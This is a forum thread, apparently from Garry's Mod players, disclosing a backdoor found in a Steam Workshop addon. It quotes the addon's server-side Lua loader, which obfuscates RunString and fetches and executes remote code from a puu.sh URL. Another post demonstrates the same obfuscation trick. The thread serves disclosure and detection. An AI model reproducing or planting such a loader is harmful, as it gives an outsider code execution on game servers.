Backdoors are back in Workshop addons again!

So yeah… Found a backdoor in a Workshop addon.

This is the workshop addon - http://steamcommunity.com/sharedfiles/filedetails/?id=584629340
The guy also has some others. I haven’t checked them out myself, but this is what he put in his lua/autorun/server/resource.lua in this addon.



local rstr=_G["Ru".."nStr".."ing"];
RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
	htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);


Not sure the best was to handle this kind of situation but hopefully someone who can do something about it will see this.
Thanks, Hackcraft

Well that text file doesn’t exist, but it certainly is a mc-dodgy.

Why the fuck do people put that shit in addons anyway?

why do people keep making bad backdoors?

Its simple. You just have to say one word to understand.

E-peen. People just include them to look more powerful than anyone else.

Wrong word. The word you are actually looking for is “bonjour”

I should really finish that backdoor busting system…

The workshop item got removed

What was it originally?

Cops and Robbers playermodels or something like that

Oh btw, the only way I managed to find it was by using Nomalua – GMod/Lua malware scanner (v1.20)

Did the backdoors ever go away?

My lord that is the worst hidden backdoor I have ever seen. What did the devs think? “No one will know we’re using RunString if we do _G[ “Run” … “St” … “ring” ]”



local Dan = "Run"
local kMe = "Str"
local mes = "ing"
local AyyLmao = _G[Dan .. kMe .. mes]
AyyLmao("while true do print('memes') end")


:v:

[editline]26th July 2016[/editline]

see…

I think he was talking about overall; not just this addon.